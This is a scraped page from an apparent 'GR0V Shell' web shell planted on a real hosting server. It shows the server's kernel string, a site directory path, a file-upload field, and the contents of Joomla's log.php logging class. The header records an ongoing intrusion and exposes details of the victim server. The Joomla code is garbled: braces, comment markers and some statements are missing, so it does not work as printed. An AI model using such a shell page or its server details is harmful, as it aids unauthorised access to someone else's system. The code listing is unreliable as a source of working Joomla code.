? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/happy2/libraries/joomla/log/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/happy2/libraries/joomla/log/log.php

 * @package     Joomla.Platform
 * @subpackage  Log
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE

defined('JPATH_PLATFORM') or die;


JLoader::register('LogException', JPATH_PLATFORM . '/joomla/log/logexception.php');

JLoader::discover('JLogger', dirname(__FILE__) . '/loggers');

// @deprecated  12.1

 * Joomla! Log Class
 * This class hooks into the global log configuration settings to allow for user configured
 * logging events to be sent to where the user wishes them to be sent. On high load sites
 * SysLog is probably the best (pure PHP function), then the text file based loggers (CSV, W3C
 * or plain FormattedText) and finally MySQL offers the most features (e.g. rapid searching)
 * but will incur a performance hit due to INSERT being issued.
 * @package     Joomla.Platform
 * @subpackage  Log
 * @since       11.1
class JLog
	 * All log priorities.
	 * @var    integer
	 * @since  11.1
	const ALL = 30719;

	 * The system is unusable.
	 * @var    integer
	 * @since  11.1
	const EMERGENCY = 1;

	 * Action must be taken immediately.
	 * @var    integer
	 * @since  11.1
	const ALERT = 2;

	 * Critical conditions.
	 * @var    integer
	 * @since  11.1
	const CRITICAL = 4;

	 * Error conditions.
	 * @var    integer
	 * @since  11.1
	const ERROR = 8;

	 * Warning conditions.
	 * @var    integer
	 * @since  11.1
	const WARNING = 16;

	 * Normal, but significant condition.
	 * @var    integer
	 * @since  11.1
	const NOTICE = 32;

	 * Informational message.
	 * @var    integer
	 * @since  11.1
	const INFO = 64;

	 * Debugging message.
	 * @var    integer
	 * @since  11.1
	const DEBUG = 128;

	 * The global JLog instance.
	 * @var    JLog
	 * @since  11.1
	protected static $instance;

	 * The array of instances created through the deprecated getInstance method.
	 * @var         array
	 * @since       11.1
	 * @see         JLog::getInstance()
	 * @deprecated  12.1
	public static $legacy = array();

	 * Container for JLogger configurations.
	 * @var    array
	 * @since  11.1
	protected $configurations = array();

	 * Container for JLogger objects.
	 * @var    array
	 * @since  11.1
	protected $loggers = array();

	 * Lookup array for loggers.
	 * @var    array
	 * @since  11.1
	protected $lookup = array();

	 * Constructor.
	 * @since   11.1
	protected function __construct()

	 * Method to add an entry to the log.
	 * @param   mixed    $entry     The JLogEntry object to add to the log or the message for a new JLogEntry object.
	 * @param   integer  $priority  Message priority.
	 * @param   string   $category  Type of entry
	 * @param   string   $date      Date of entry (defaults to now if not specified or blank)
	 * @return  void
	 * @since   11.1
	public static function add($entry, $priority = JLog::INFO, $category = '', $date = null)
		// Automatically instantiate the singleton object if not already done.
		if (empty(self::$instance))
			self::setInstance(new JLog);

		// If the entry object isn't a JLogEntry object let's make one.
		if (!($entry instanceof JLogEntry))
			$entry = new JLogEntry((string) $entry, $priority, $category, $date);


	 * Method to set the way the JError will handle different error levels.
	 * Use this if you want to override the default settings.
	 * @param   array    $options     The object configuration array.
	 * @param   integer  $priorities  Message priority
	 * @param   array    $categories  Types of entry
	 * @return  void
	 * @since   11.1
	public static function addLogger(array $options, $priorities = JLog::ALL, $categories = array())
		// Automatically instantiate the singleton object if not already done.
		if (empty(self::$instance))
			self::setInstance(new JLog);

		// The default logger is the formatted text log file.
		if (empty($options['logger']))
			$options['logger'] = 'formattedtext';
		$options['logger'] = strtolower($options['logger']);

		// Generate a unique signature for the JLog instance based on its options.
		$signature = md5(serialize($options));

		// Register the configuration if it doesn't exist.
		if (empty(self::$instance->configurations[$signature]))
			self::$instance->configurations[$signature] = $options;

		self::$instance->lookup[$signature] = (object) array(
			'priorities' => $priorities,
			'categories' => array_map('strtolower', (array) $categories));

	 * Returns a JLog object for a given log file/configuration, only creating it if it doesn't already exist.
	 * This method must be invoked as:
	 * <code>$log = JLog::getInstance($file, $options, $path);</code>
	 * @param   string  $file     The filename of the log file.
	 * @param   array   $options  The object configuration array.
	 * @param   string  $path     The base path for the log file.
	 * @return  JLog
	 * @since   11.1
	 * @deprecated  12.1
	public static function getInstance($file = 'error.php', $options = null, $path = null)
		// Deprecation warning.
		JLog::add('JLog::getInstance() is deprecated.  See JLog::addLogger().', JLog::WARNING, 'deprecated');

		// Get the system configuration object.
		$config = JFactory::getConfig();

		// Set default path if not set and sanitize it.
		if (!$path)
			$path = $config->get('log_path');

		// If no options were explicitly set use the default from configuration.
		if (empty($options))
			$options = (array) $config->get('log_options');

		// Fix up the options so that we use the w3c format.
		$options['text_entry_format'] = empty($options['format']) ? null : $options['format'];
		$options['text_file'] = $file;
		$options['text_file_path'] = $path;
		$options['logger'] = 'w3c';

		// Generate a unique signature for the JLog instance based on its options.
		$signature = md5(serialize($options));

		// Only create the object if not already created.
		if (empty(self::$legacy[$signature]))
			self::$legacy[$signature] = new JLog;

			// Register the configuration.
			self::$legacy[$signature]->configurations[$signature] = $options;

			// Setup the lookup to catch all.
			self::$legacy[$signature]->lookup[$signature] = (object) array('priorities' => JLog::ALL, 'categories' => array());

		return self::$legacy[$signature];

	 * Returns a reference to the a JLog object, only creating it if it doesn't already exist.
	 * Note: This is principally made available for testing and internal purposes.
	 * @param   JLog  $instance  The logging object instance to be used by the static methods.
	 * @return  void
	 * @since   11.1
	public static function setInstance($instance)
		if (($instance instanceof JLog) || $instance === null)
			self::$instance = & $instance;

	 * Method to add an entry to the log file.
	 * @param   array  $entry  Array of values to map to the format string for the log file.
	 * @return  boolean  True on success.
	 * @since         11.1
	 * @deprecated    12.1  Use JLog::add() instead.
	public function addEntry($entry)
		// Deprecation warning.
		JLog::add('JLog::addEntry() is deprecated, use JLog::add() instead.', JLog::WARNING, 'deprecated');

		// Easiest case is we already have a JLogEntry object to add.
		if ($entry instanceof JLogEntry)
			return $this->addLogEntry($entry);
		// We have either an object or array that needs to be converted to a JLogEntry.
		elseif (is_array($entry) || is_object($entry))
			$tmp = new JLogEntry('');
			foreach ((array) $entry as $k => $v)
				switch ($k)
					case 'c-ip':
						$tmp->clientIP = $v;
					case 'status':
						$tmp->category = $v;
					case 'level':
						$tmp->priority = $v;
					case 'comment':
						$tmp->message = $v;
						$tmp->$k = $v;
		// Unrecognized type.
			return false;

		return $this->addLogEntry($tmp);

	 * Method to add an entry to the appropriate loggers.
	 * @param   JLogEntry  $entry  The JLogEntry object to send to the loggers.
	 * @return  void
	 * @since   11.1
	 * @throws  LogException
	protected function addLogEntry(JLogEntry $entry)
		// Find all the appropriate loggers based on priority and category for the entry.
		$loggers = $this->findLoggers($entry->priority, $entry->category);

		foreach ((array) $loggers as $signature)
			// Attempt to instantiate the logger object if it doesn't already exist.
			if (empty($this->loggers[$signature]))

				$class = 'JLogger' . ucfirst($this->configurations[$signature]['logger']);
				if (class_exists($class))
					$this->loggers[$signature] = new $class($this->configurations[$signature]);
					throw new LogException(JText::_('Unable to create a JLogger instance: '));

			// Add the entry to the logger.

	 * Method to find the loggers to use based on priority and category values.
	 * @param   integer  $priority  Message priority.
	 * @param   string   $category  Type of entry
	 * @return  array  The array of loggers to use for the given priority and category values.
	 * @since   11.1
	protected function findLoggers($priority, $category)
		// Initialize variables.
		$loggers = array();

		// Sanitize inputs.
		$priority = (int) $priority;
		$category = strtolower($category);

		// Let's go iterate over the loggers and get all the ones we need.
		foreach ((array) $this->lookup as $signature => $rules)
			// Check to make sure the priority matches the logger.
			if ($priority & $rules->priorities)

				// If either there are no set categories (meaning all) or the specific category is set, add this logger.
				if (empty($category) || empty($rules->categories) || in_array($category, $rules->categories))
					$loggers[] = $signature;

		return $loggers;
